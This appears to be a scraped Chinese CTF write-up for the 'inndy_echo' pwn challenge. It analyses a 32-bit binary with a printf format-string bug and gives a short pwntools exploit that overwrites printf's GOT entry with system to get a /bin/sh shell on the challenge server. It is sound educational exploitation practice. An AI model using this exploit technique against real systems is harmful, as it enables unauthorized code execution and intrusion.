当前位置: 首页 > news >正文

inndy_echo

news 来源:原创 2025/4/20 23:07:12

inndy_echo

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)

32位,只开了NX

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  char s; // [esp+Ch] [ebp-10Ch]
  unsigned int v4; // [esp+10Ch] [ebp-Ch]

  v4 = __readgsdword(0x14u);
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
  do
  {
    fgets(&s, 0x100, stdin);
    printf(&s);
  }
  while ( strcmp(&s, "exit\n") );
  system("echo Goodbye");
  exit(0);
}

程序很简单,给了格式化字符串漏洞,并且给了system

思路

printf@got-->system 输入/bin/sh

from pwn import*
from Yapack import *
r,elf=rec("node4.buuoj.cn",25120,"./pwn",10)
context(os='linux', arch='i386',log_level='debug')
#debug('b *0x80485b9')

pl=fmtstr_payload(7,{elf.got['printf']:elf.sym['system']})
sl(pl)
sl(b'/bin/sh\x00')
ia(c)

在这里插入图片描述

相关文章:

  • Mysql各种锁
  • C语言文件操作与管理
  • 信息安全第四周
  • 开源校园服务小程序源码 校园综合服务小程序源码 包含快递代取 打印服务 校园跑腿【带详细部署教程】
  • Mybatis 二级缓存(使用Redis作为二级缓存)
  • Springboot: Spring Cloud Gateway 使用的基本概念及配置介绍
  • Docker 网桥、docker0 网桥和 --net host:平台差异、使用方式和场景介绍简介:
  • 恼人的TCP套接字部分发送成功场景
  • SpringCloud篇
  • 嵌入式Linux应用开发-第十四章查询方式的按键驱动程序
  • 学会使用Git 和 GitHub
  • 文本嵌入层
  • Qt raise()问题
  • 【QT】使用toBase64方法将.txt文件的明文变为非明文(类似加密)
  • Mysql生产随笔
  • vue下载在前端存放的pdf文件
  • 玩碎Java之CompletableFuture的例子
  • Java初始化大量数据到Neo4j中(二)
  • lambda的使用案例(1)
  • 探索视听新纪元: ChatGPT的最新语音和图像功能全解析
  • 科普|军团菌肺炎:春末夏初的隐形健康威胁
  • 人民文学奖颁出,董宇辉获传播贡献奖
  • 泸州市长余先河已任四川省委统战部常务副部长
  • 专业纯粹,安静温暖,上海古籍书店明日重新开张
  • 跨境电商敦煌网在美下载量飙升,如何接住美国用户的“流量”?
  • 习近平会见柬埔寨太后莫尼列